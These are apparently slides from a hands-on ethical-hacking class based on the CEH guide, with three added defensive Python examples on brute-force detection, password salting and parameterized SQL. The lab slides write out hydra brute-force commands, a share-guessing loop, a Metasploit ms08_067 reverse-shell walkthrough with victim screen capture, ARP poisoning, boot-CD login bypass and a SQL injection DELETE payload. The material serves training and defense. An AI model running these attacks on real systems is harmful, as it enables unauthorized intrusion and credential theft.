Strengths, Weakness, Security Interests, Something Fun

2
- Strengths
- Weakness
- Security Interests
- Something Fun

3
- Give students offensive knowledge to better defend computer networks
- Hands-on security training to complement theory; put theories into practice
  - "Tell me and I'll forget; show me and I may remember; involve me and I'll understand."
- Knowledge sharing: the power of group learning

4
- Group Exercise: What do you see in the following pictures?

5
- Increase experience with a multitude of security aspects
- Network with other security-minded professionals
- Play in a safe lab environment not offered at work or home
- Earn CPEs to maintain certifications without high costs
  - For CISSP:
    - Preparing and presenting a 2 hour presentation = 8 CPEs
    - Participating 1 hour = 1 CPE
    - Updating an existing presentation (see the ISC2 chart for specifics)

6
- Have your questions answered; bring hard issues that require solutions
- Improve public speaking and training skills

7
CEH Certified Ethical Hacker Study Guide, Kimberly Graves, 2010
Course Chapters:
- Chapter 1: Introduction to Ethical Hacking, Ethics, and Legality
- Chapter 2: Gathering Target Information: Reconnaissance, Footprinting, and Social Engineering
- Chapter 3: Gathering Network and Host Information: Scanning and Enumeration
- Chapter 4: System Hacking: Password Cracking, Escalating Privileges, and Hiding Files
- Chapter 5: Trojans, Backdoors, Viruses, and Worms
- Chapter 6: Gathering Data from Networks: Sniffers
- Chapter 7: Denial of Service and Session Hijacking
- Chapter 8: Web Hacking: Google, Web Servers, Web Application Vulnerabilities, and Web-Based Password Cracking Techniques
- Chapter 9: Attacking Applications: SQL Injection and Buffer Overflows
- Chapter 10: Wireless Network Hacking: Wi-Fi and Ethernet
- Chapter 11: Physical Site Security
- Chapter 12: Hacking Linux Systems
- Chapter 14: Cryptography
- Chapter 15: Performing a Penetration Test

8
- Class 1: Methodologies and Lab Setup
- Class 2: Passive Information Gathering
- Class 3: Active Information Gathering (Nessus)
- Class 4: Target System Penetration
- Class 5: Wireless and Wired Network Enumeration
- Class 6: Privilege Escalation, Maintaining Access, and Malware
- Class 7: Web Application Penetration
- Class 8: Covering Tracks, IDS, Reporting, and Cleanup
- Class 9: Metasploit
- Class 10: Physical Security (Lock Picking etc.)
- Class 11: Capture the Flag

9
- System Hacking
- Password Attacks
- Remote Exploits via Metasploit
- Web Application Penetration
- Social Engineering Attacks
- DoS Attacks
- Exercises

10
DO NOT perform any activities from this course on any network/system or on a network-connected device without proper permission! Make sure you have written permission and authorization to conduct these activities on any system. Conducting any activities related to penetration testing requires the consent of the owner of the target system and the internet service provider. Failure to obtain consent in the form of a legal contract can result in fines and imprisonment.

11
Information Systems Security Assessment Framework (ISSAF)

12
- Kimberly Graves CEH Book

13
- With a username/password combination, you can log in to the target via a running service
- With only a username or only a password, use an online cracker
- If both are unknown, use an online cracker, exploit code or an automated exploit tool
- After gaining access to the target, secure the communications link and escalate user privileges for greater system access

14
- Security depends highly on passwords and the ability to keep them secret.
- Something you know
- Importance of length and complexity
- People write passwords down
- Most people use the minimum required length

15
- Passive Online
- Active Online
- Offline
- Non-Electronic

16
- Sniffing
  - Not detectable
  - Capture the clear text or hash
- Man-in-the-middle
  - Intercept the authentication request and forward it to the server
- Replay Attacks
  - Capture and later resend authentication packets
  - Don't have to know the password, just replay it.
Tools: acquire clear-text passwords over the network using sniffing tools: ScoopLM, Ettercap, Cain and Abel

17
- Password Guessing
- Use common default credentials
  - Example user names: administrator, admin, sys, root
  - Example passwords: password, oracle, etc.
- Connect to a share, e.g. \\ip_address\c$, SSH, RDP, FTP, etc.
- Use automated tools/scripts
- Using the reconnaissance info, create targeted password lists ordered from high to low probability
  - If the minimum length is 8, don't try passwords shorter than 8
  - Try the most commonly used special characters, e.g. !, @, $

18
- A free, online, login-cracking tool that can attack many services
- Uses a given username and password combination to brute force the service login
- Use short username and password lists for best performance
- Most useful for breaking into a system with a weak password or for which a username is known
- hydra -l username -P password_list IP_address service

19
- Create a simple username and password file using Windows Notepad. Save the file as credentials.txt.
- Pipe this file using the FOR command so that the credentials in credentials.txt are used to attempt to log on to the target system's hidden share.
- C:\> FOR /F "tokens=1,2*" %i in (credentials.txt) do net use \\target\IPC$ %i /u:%j

20
- Defenses:
  - Two-factor authentication
  - Account lockouts/max attempts
  - Log/review brute force attempts
    - C:\windows\system32\config\Sec.Evt
    - /var/log or /var/log/lastlog
  - Password change interval
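The "log/review brute force attempts" and "account lockouts/max attempts" defenses above are easy to state and rarely shown. The following is an added example written for this page (not a tool from the course) that reviews an auth log the way a lockout policy would: it counts failed logins per source address inside a sliding window and flags both the point where a lockout threshold is crossed and a success that follows a burst of failures. The sshd-style log lines are constructed, and the threshold (5) and window (10 minutes) are assumed policy values.

```python
"""Added example (not from the slides): detecting online brute-force attempts in
an auth log. Log lines are constructed to look like sshd entries in
/var/log/auth.log; threshold and window are assumed policy values."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not a real capture). The year is omitted, as in syslog.
SAMPLE_LOG = """\
Mar  3 10:00:01 host sshd[1201]: Failed password for root from 203.0.113.7 port 51012 ssh2
Mar  3 10:00:03 host sshd[1202]: Failed password for admin from 203.0.113.7 port 51013 ssh2
Mar  3 10:00:04 host sshd[1203]: Failed password for invalid user sys from 203.0.113.7 port 51014 ssh2
Mar  3 10:00:06 host sshd[1204]: Failed password for root from 203.0.113.7 port 51015 ssh2
Mar  3 10:00:07 host sshd[1205]: Failed password for root from 203.0.113.7 port 51016 ssh2
Mar  3 10:00:09 host sshd[1206]: Accepted password for root from 203.0.113.7 port 51017 ssh2
Mar  3 10:05:00 host sshd[1210]: Failed password for alice from 198.51.100.20 port 40000 ssh2
Mar  3 10:20:00 host sshd[1211]: Failed password for alice from 198.51.100.20 port 40001 ssh2
Mar  3 10:20:05 host sshd[1212]: Accepted password for alice from 198.51.100.20 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_line(line, year=2024):
    """Return (timestamp, result, user, ip) or None for lines we do not care about.
    Syslog has no year, so one is assumed for timestamp arithmetic."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=10)):
    """Sliding-window count of failed logins per source IP.

    Emits ("threshold_reached", ip, user, ts) when an IP accumulates `threshold`
    failures inside `window` (where an account-lockout policy would trigger),
    and ("success_after_failures", ip, user, ts) when a login from that IP
    succeeds while its failure count is still at or above the threshold, the
    pattern of a guess that finally landed.
    """
    recent_failures = defaultdict(list)  # ip -> timestamps of failures in window
    alerts = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        # Expire failures that have fallen outside the window.
        recent_failures[ip] = [t for t in recent_failures[ip] if ts - t <= window]
        if result == "Failed":
            recent_failures[ip].append(ts)
            if len(recent_failures[ip]) == threshold:  # fire once, at the crossing
                alerts.append(("threshold_reached", ip, user, ts.isoformat()))
        elif len(recent_failures[ip]) >= threshold:
            alerts.append(("success_after_failures", ip, user, ts.isoformat()))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

On the constructed log, the first source crosses the threshold at its fifth failure and then logs in successfully two seconds later, which produces two alerts; the second source's two failures are fifteen minutes apart, so with a ten-minute window it never trips the rule. Windows Security event logs (the Sec.Evt file named on the slide) carry the same information under different event IDs and would need a different parser, but the counting logic is the same.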

21
- Defenses:
  - Creating strong passwords
    1. Start with a memorable phrase, such as Maryhadalittlelamb
    2. Change every other character to uppercase, resulting in MaRyHaDaLiTtLeLaMb
    3. Change a to @ and i to 1 to yield M@RyH@D@L1TtLeL@Mb
    4. Drop every other pair to result in a secure, repeatable password: M@H@L1LeMb (this can easily be remade)
Do you have any other suggestions?

22
- Usually requires physical access
- Dump the password file (shadow/SAM)
  - C:\windows\system32\config vs. /etc/shadow
- Types of Offline Password Attacks
  - Dictionary, e.g. Experience
  - Hybrid, e.g. Exper1ence
  - Brute Force, e.g. !QAZxdr%16
- Given enough time and processing power, passwords can be cracked (Moore's Law)

23
- Decrypt passwords stored in Windows SAM or Linux shadow files using dictionary, hybrid, brute-force, or rainbow table methods
- John the Ripper, Cain and Abel, Ophcrack

24
- A free, cross-platform, password-breaking tool that can break many different kinds of encryption
  - DES
  - MD5
  - Kerberos AFS
  - LM hash
- Uses offline dictionary and/or brute force attacks to compare encrypted strings and find the password
Dictionary Attack
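Slides 22 to 24 list the hash types these offline tools target (DES, MD5, LM) and the rainbow-table method. What makes those formats crackable in minutes is that they are fast and unsalted, so a digest can be precomputed once and looked up. The following is an added example written for this page (not code from the slides, John the Ripper or Ophcrack) that shows the difference: the same password always produces the same MD5 digest, so a small precomputed table reverses it, while a per-user random salt combined with an iterated KDF (PBKDF2-HMAC-SHA256 here) gives every user a different digest that no shared table can contain. The wordlist and passwords are constructed; the storage format and iteration count are choices made for the example.

```python
"""Added example (not from the slides or the tools named on them): unsalted MD5
versus salted PBKDF2. Wordlist and passwords are constructed for the demo."""
import hashlib
import hmac
import secrets

# Constructed wordlist; a real lookup table holds millions of entries.
WORDLIST = ["password", "oracle", "Experience", "Exper1ence", "letmein"]


def unsalted_md5(password):
    """Fast, unsalted hash: identical passwords always give identical digests."""
    return hashlib.md5(password.encode()).hexdigest()


def build_lookup_table(words):
    """Precompute digest -> word once. Every unsalted MD5 store can then be
    reversed by a dictionary lookup instead of hashing again; a rainbow table
    is a space-optimised version of this idea."""
    return {unsalted_md5(w): w for w in words}


def reverse_unsalted(digest, table):
    return table.get(digest)


def hash_salted(password, salt=None, iterations=200_000):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt. The stored string is
    algorithm$iterations$salt_hex$digest_hex (a format chosen here) so that
    verification can recover the parameters."""
    if salt is None:
        salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_salted(password, stored):
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    # Constant-time comparison so verification timing leaks nothing.
    return hmac.compare_digest(dk.hex(), dk_hex)


def demo():
    """Two users who chose the same weak password, stored both ways."""
    table = build_lookup_table(WORDLIST)
    md5_a, md5_b = unsalted_md5("Experience"), unsalted_md5("Experience")
    salted_a, salted_b = hash_salted("Experience"), hash_salted("Experience")
    return {
        "md5_identical": md5_a == md5_b,                # one table entry breaks both
        "md5_reversed": reverse_unsalted(md5_a, table),  # 'Experience'
        "salted_identical": salted_a == salted_b,        # False: salts differ
        "salted_in_table": reverse_unsalted(salted_a.split("$")[-1], table) is not None,
        "verify_ok": verify_salted("Experience", salted_a),
        "verify_wrong": verify_salted("Exper1ence", salted_a),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The iteration count is what turns the "given enough time and processing power" point around: each guess against a salted PBKDF2 record costs the attacker 200,000 hash operations and must be repeated per user, whereas one MD5 table serves every unsalted record ever captured.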

25
- Social Engineering
- Shoulder Surfing
- Dumpster Diving

26
- Software keyloggers are easily detected with anti-virus
- Hardware keyloggers are hard to detect

27
- Easily analyze overall network security by scanning the network, identifying vulnerabilities, launching attacks, and creating a report in one step
- Types of tools:
  - Source code assessment: application source code flaws
  - Application assessment: application runtime errors
  - System assessment: system or network configuration problems

28
- Source code assessment tools can detect buffer overflows, possible privilege escalation, race conditions, and bad input
  - Rough Auditing Tool for Security (free)
- Application assessment tools analyze runtime issues
  - AppDetective (commercial)
  - N-Stalker Web Application Security Scanner (free/commercial)

29
- Explore vulnerabilities in system-level security measures
  - Nessus (free/commercial)
  - Retina (commercial)
  - Rapid7 (free/commercial)

30
- Open source vulnerability assessment tool
  - Select the exploit module
  - Configure the exploit
  - Select the payload
  - Launch the exploit
- Contains a console-based GUI and a command-line interface
  - Armitage
- Find more exploit code to use with or without Metasploit in online databases

31
- Commercial GUI automated assessment and exploit tool
- Contains all the steps of a pen test process from scanning to reporting and cleanup
- Can return the target system to its pre-attack state after a test

32

33
- Exploit Pack
  - Tool to easily create custom exploits and a new pentest tool competitor
  - security.html

34
Manual Attack
- Identify running services and operating systems by port scanning and fingerprinting
- Find vulnerabilities
- Find exploit code or sniff login information
- Run the exploit against the target
- Open a target shell on the attacking system

Metasploit Attack
- Identify the IP address and operating system of the target system
- Choose an exploit from the database
- Choose a payload
- Choose an encoding method
- Run the exploit against the target

35
- WEP cracking can use one or two systems
- One injects traffic and the other sniffs traffic from the victim
- Aircrack is a tool suite that provides everything needed to crack WEP, including:
  - Airodump: captures wireless packets
  - Aireplay: performs injection attacks
  - Aircrack: cracks WEP keys
- Other tools:
  - THC-wardrive
  - WaveStumbler
  - Airsnarf
  - Airsnort
  - Airtraf
  - Omnipeek

36
Denial of Service
- An attack that does not give the attacker access to the system, but makes the service unavailable to users by flooding the target with network packets
- Types of wireless DoS attacks:
  - Authentication flood
  - Deauthentication flood
  - Network jamming
  - Equipment destruction

37
- Finding vulnerabilities in the application and exploiting them
- Allows access to data and even to the system
- SQL Injection: SELECT * FROM items WHERE owner = 'hacker' AND itemname = 'name'; DELETE FROM items; --'
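The slide's query shows the result of splicing user input into SQL text but not the code that produces it or the fix. The following is an added example written for this page (not code from the slides or from badstore) using Python's sqlite3 module and an in-memory table constructed for the demo: the concatenating version returns every row when the itemname carries a quote and an OR clause, while the parameterized version treats the same string as a literal and returns nothing. A third function sends the slide's exact stacked payload to the concatenating query and shows that the sqlite3 driver refuses to run a second statement, which is a property of this driver rather than a defense.

```python
"""Added example (not from the slides): the slide's query built by string
concatenation beside the parameterized form. Table and rows are constructed."""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (owner TEXT, itemname TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [("hacker", "name"), ("alice", "laptop"), ("bob", "badge")])
    return conn


def lookup_vulnerable(conn, owner, itemname):
    """Untrusted input spliced straight into the SQL text: a quote character in
    itemname ends the literal and the rest of the input becomes SQL, which is
    exactly the statement the slide shows."""
    sql = f"SELECT * FROM items WHERE owner = '{owner}' AND itemname = '{itemname}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, owner, itemname):
    """Placeholders: the statement text is fixed and the values travel
    separately, so quotes in the input stay data and can never become SQL."""
    sql = "SELECT * FROM items WHERE owner = ? AND itemname = ?"
    return conn.execute(sql, (owner, itemname)).fetchall()


def stacked_payload_rejected(conn):
    """Feeds the slide's payload (name'; DELETE FROM items; --) to the vulnerable
    query. The sqlite3 module executes one statement per call and raises on the
    trailing DELETE (sqlite3.Warning on older Pythons, ProgrammingError on newer),
    so the table survives here. Other drivers and DBMSs do execute stacked
    statements; only the parameterized form is a real fix."""
    try:
        lookup_vulnerable(conn, "hacker", "name'; DELETE FROM items; --")
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        return True
    return False


def row_count(conn):
    return conn.execute("SELECT count(*) FROM items").fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    probe = "x' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, "hacker", probe))  # every row
    print("safe:      ", lookup_safe(db, "hacker", probe))        # no rows
    print("stacked payload rejected by driver:", stacked_payload_rejected(db))
    print("rows remaining:", row_count(db))
```

The probe string `x' OR '1'='1` is the same trick as the slide's payload with a tautology in place of the second statement; because AND binds tighter than OR, the owner check is bypassed for every row. Note that in the safe version the string can be anything at all, including the slide's DELETE payload, and the query still compares it against itemname as data.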

38

40
- Lab setup
- Exercises

41
- Host Operating System = Ubuntu (Linux)
- Virtual Machine = VirtualBox
- VMs = Backtrack, Windows (Guest PC), XP-1, badstore
- Each laptop has its own separate standalone lab environment
- How to start the lab environment:
  1) Open VirtualBox
  2) Ensure that the Backtrack VM is powered on
  3) Log on to Backtrack (root/toor) and type startx
  4) Set the static IP address (.100): ifconfig eth3 netmask up
  5) Ensure that the badstore VM has the badstore CD mounted and then start the VM
  6) Configure the badstore VM IP address via the following command: ifconfig eth0 netmask up

42
- In the following scenario, you have already gathered as much information about your target as possible for planning the attack.
- Your target is [target address not preserved in the transcript]. The company has hired you to confirm that their continuous monitoring program is working effectively. The administrators claim to have patched and hardened every machine. Now it is your job to see if any of the systems can be hacked.

43
- Remotely access the application?
  - Example: SQL Injection

44
- Video

45
- Remotely access the system via social engineering?
  - Example: Malicious email (spear phishing)

46
- Navigate to _Tools:_Social_Engineer_Toolkit_(SET)
- Read the first paragraph introducing SET.
- From the table of contents click on 3.1 Spear-Phishing Attack Vector and review an example of how SET can be used.
- Note: after gathering all the recon info, it is easy to use SET to conduct computer-based social engineering.
- Or view the video: using-SET/Social-Engineering-Email-Attack-using-SET.html

47
- Remotely access the system via network pentesting tools?
  - Example: Metasploit or Core Impact

48
- From the Guest workstation:
- Log on u=visitor p=qwerty
- Open the Nessus client via the link on the desktop
- From the reports tab, browse the internal network scan report
- Click on "show filters"
- Check "exploit exists"
- Review the exploits that can be run against the target's high vulnerabilities
  - MS08_067

49
- Open a terminal in Backtrack and type: msfconsole
- How many exploits and payloads are available?
  - 684 exploits and 217 payloads
- Type: show ms08_067
- When was the exploit disclosed and what is the ranking?
  - Disclosed: 10/28/2008, Ranking: Great
- To use the exploit type:
  - use windows/smb/ms08_067_netapi
  - set payload windows/meterpreter/reverse_tcp
  - set lhost
  - set rhost
  - exploit

50
- A meterpreter session will display. To show the meterpreter options type: help
- We are going to start a command shell on the victim system
- Type: execute -f cmd.exe -c -i
- To confirm you're on the victim system type: hostname
- Note: with an admin user command shell the system is owned. If we did not have admin we would need to escalate privileges.

51
- Next we will grab a screen capture of the victim's screen
  - To review the list of processes type: ps
  - Note the Windows Explorer process id
  - Migrate to the Explorer process id, for example type: migrate 168
  - Next load and use the meterpreter extension "espia" to enable capture of the victim screen
  - Type: use espia
  - Run screengrab to start capturing victim screenshots
  - Type: screengrab

52
- From Backtrack open a terminal and type: armitage
- Click the "start msf" button
- It will take a few moments to load
- Enter the attack computer IP in the dialog box:
- From the menu bar: Hosts → Nmap scan → Intense scan
- Enter range:
- Watch the nmap output as the scan is running
- When the scan completes, hit "ok"
- In the search tool bar, type ms08_067
- Double click the exploit, review the options, and click launch
- If the exploit is successful, the icon will have lightning bolts and the console screen will report an open meterpreter session

53
- Kill the meterpreter session: right click the victim → meterpreter → kill
- What if we did not know what attack to use? We could use Armitage to show us the available attacks
  - From the menu: Attacks → Find Attacks → by vulnerability
  - Choose "ok" on the dialog box.
  - Right click the target system → Attack → SMB → ms08_067
- What if you wanted to automate the process or did not know what to exploit (Hail Mary)?
  - From the menu: Attacks → Hail Mary → by vulnerability
  - Watch as the victim is auto-owned

54
- Now that you have a meterpreter session you could dump the hash, grab screen captures, run keyloggers etc.
- Let's try a victim screen capture
  - Right click the victim → meterpreter → explore → screenshot

55
- Video

56
- Passively obtain passwords to remotely access the system?
  - Example: Sniff Passwords

57
- Right click "my computer" → services
- Right click the "telnet" service and change the startup type to automatic
- Press the "start" button and then hit "ok".
- From a Backtrack terminal type: wireshark
- From the interface list choose eth3
- Open another terminal and type: telnet
- Enter the username and password
- Stop the running live capture and review it for credentials
- Right click on a record containing telnet and choose "follow tcp stream"
- Can you see the password in plain text?

58
- From the guest pc, start Cain and Abel from the desktop shortcut
- Press the start/stop sniffing button and a dialog box will appear
- Choose the network to sniff ( and press "ok"
- From backtrack, open a terminal and type: telnet
- Enter the username/password (e.g. visitor/qwerty)
- From the guest pc, click on the sniffer tab, and then click on the passwords tab
- Right click on the recorded record to view the telnet credential information.

59
- Ensure that badstore is up and running.
- From the guest pc, open a web browser to:
- Click the login/register link
- Create a new account
- Go back to the Cain and Abel screen
- Under the passwords tab, click on http
- Note that the username and password have been captured

60
- Attempt remote logon?
  - via online password attacks using hydra, scripts

61
1. We are going to try to get the account information of a user by brute-forcing a Telnet login. Open a command line terminal in BackTrack, type hydra and hit Enter to see the options.
2. What options do we need to use to customize hydra to:
   1. Input a login name? A file of login names?
   2. Input a file of passwords?
   3. Try the login name as the password?
   4. Stop running after a login pair is found?
   5. Limit the number of parallel tasks?
3. Use all the following options with the base command: hydra -L users.txt -P passwords.txt telnet
   1. Login name file: users.txt
   2. Password file: passwords.txt
4. What login name/password combination was found?

62
- Gain physical access to the system to log on?
  - Example: Password cracking Live CD (Ophcrack), Konboot, Windows Ultimate Boot CD

63
1. From the VM settings menu for XP-1 place the konboot iso in the CD drive.
2. Reboot/boot XP-1.
3. The konboot program will boot from the CD. Press Enter when the initial konboot screen appears.
4. Once the Windows operating system has finished loading you can log on with no password.
5. Click Administrator. Note: you accessed the machine with admin rights and no password.

64
1. From the VM settings menu for XP-1 place the Ophcrack iso in the CD drive.
2. Reboot XP-1.
3. The Ophcrack program will boot from the CD.
4. Choose the following options once the CD boots:
   - Choose low RAM
   - Choose OK for EN-English
   - Scroll to the bottom and choose US-USA
   - Choose screen of 1024x768x16
   - Now Ophcrack will auto load and start cracking passwords

65
Note: Stop the password cracking once you have cracked 3/5 passwords (~3 minutes) by choosing stop.
4. Record the usernames and passwords.
5. Are there any passwords that did not get cracked? If so, why do you think the password did not get cracked?
   - Note how little time it took to crack the passwords and the importance of strong passwords.
Ophcrack XP Rainbow Tables

66
6. Exit Ophcrack by pressing any key from the terminal window. Then press "Y" to shut down the PC.
7. Remove Ophcrack from the CD drive.
8. Power on XP-1.

67
- If konboot does not work, and you're not able to get the passwords using Ophcrack, you will need to reset the password.
1. From the VM settings menu for XP-1 place the ubcd4.iso in the CD drive.
2. Reboot/boot XP-1.
3. The Windows Ultimate Boot program will boot from the CD.
4. At the welcome screen press Enter to "launch" the ubcd program.
5. On the preshell window press start shell or wait 3 seconds for it to auto run.
6. The network dialog window will appear; choose No, since you do not want to start the networking configuration.

68
7. When the o/s has finished booting open the password reset tool: Start → Programs → Password Tools → NTPWEdit
8. Press the "re-open" button. Note the users on the machine. The true built-in admin account will have ID 500.
9. Select the true admin account and press the "change password" button.
10. Press the "save changes" button.
11. Press the "exit" button.
12. Shut down XP-1.
13. Remove ubcd4 from the VM CD drive on XP-1.
14. Boot XP-1 and use the new password for the admin account.

69
- Remotely access the application?
- Remotely access the system via social engineering?
- Remotely access the system via network pentesting tools?
- Obtain passwords to remotely access the system?
- Attempt remote logon via online password attacks?
- Gain physical access to the system to log on?
- When all else fails:
  - Denial of Service
Failed

70
- Verify that the badstore VM is up and running
- From the guest pc, open a web browser to the badstore site:
  - http://
- From backtrack open a terminal and type: ettercap -G
- From the menu: sniff → unified sniffing
- Choose the network interface to use: eth3
- From the menu: Hosts → scan for hosts
- Press h to view the host list.
- From the menu: Mitm → Arp poisoning
- From the guest pc, open a web browser to the badstore site:
  - http://
  - Note the website is not accessible from the guest pc

71
- Video

72
- After gaining initial access to the target system, it is necessary to keep going
- Open a backdoor to maintain access
- Hide traces of the break-in
- Escalate privileges and attack other computers on the network with the victim as the attack source
- Next class: Enumeration and Post Penetration
- Questions?

73
- Guide/dp/0470525207/ref=sr_1_1?s=books&ie=UTF8&qid=1323531433&sr=1-1
- Lab/dp/0470179864/ref=sr_1_1?s=books&ie=UTF8&qid=1323535901&sr=1-1
- Oceans 11 clip:
- photos-go-online-in-new-archive-1825926.html?action=gallery&ino=6

74
- National Vulnerability Database
- Exploit-Database
- Securitytracker
- Securiteam
- Hackerstorm Vulnerability Research
- Hackerwatch
- SecurityFocus
- Security Magazine
- SC Magazine
- surveillance/

75
- Sarah Palin

76
- lkit_(SET)
- metasploit-meterpreter/
- sql injection
- office space
- core impact

77
- PDF mapping tools to the different phases of pen testing.
- Review the list of tools and pick tools that you know and can demonstrate or that you would like to learn more about.
CEH Certified Ethical Hacker All-in-One Exam Guide

78
- Social Engineering Toolkit
- Maltego
- Linux (Mike)
- Snort
- Wireshark
- Nessus
- Web Security (KB)
- Crypto (KB)
- Nmap
- Metasploit

79
TBD
